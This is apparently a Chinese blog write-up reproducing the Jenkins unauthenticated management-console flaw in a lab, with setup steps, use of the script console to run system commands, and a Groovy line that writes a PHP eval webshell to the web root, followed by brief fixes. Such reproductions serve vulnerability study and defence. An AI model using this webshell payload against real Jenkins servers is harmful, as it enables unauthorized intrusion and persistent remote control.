jenkins未授权访问漏洞
jenkins未授权访问漏洞
一、漏洞描述
未授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。
二、漏洞环境搭建
1、官方下载jenkins-1.620-1.1.noarch.rpm,下载地址:http://mirrors.jenkins.io
2、在redhat安装jenkins
rpm -ivh jenkins-1.620-1.1.noarch.rpm
3、开启jenkins服务
4、浏览器访问http://192.168.10.137:8080,如下图所示说明环境搭建成功
三、漏洞复现
1、浏览器访问http://192.168.10.137:8080/manage,可以看到没有做任何限制,可以直接访问
2、点击”脚本命令行”
3、执行系统命令,下图看到成功执行系统命令
4、利用”脚本命令行”上传webshell,内容如下:
new File("/var/www/html/media.php").write('<?php @eval($_POST[cmd]);?>');
5、点击“运行”,没有报错,上传成功
6、菜刀连接
四、漏洞防御
1、对后台控制页面做登录验证限制
2、升级版本
分类:
漏洞复现--web中间件漏洞
标签:
jenkins未授权访问漏洞
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
· 地球OL攻略 —— 某应届生求职总结
· 提示词工程——AI应用必不可少的技术
· Open-Sora 2.0 重磅开源!
· 周边上新:园子的第一款马克杯温暖上架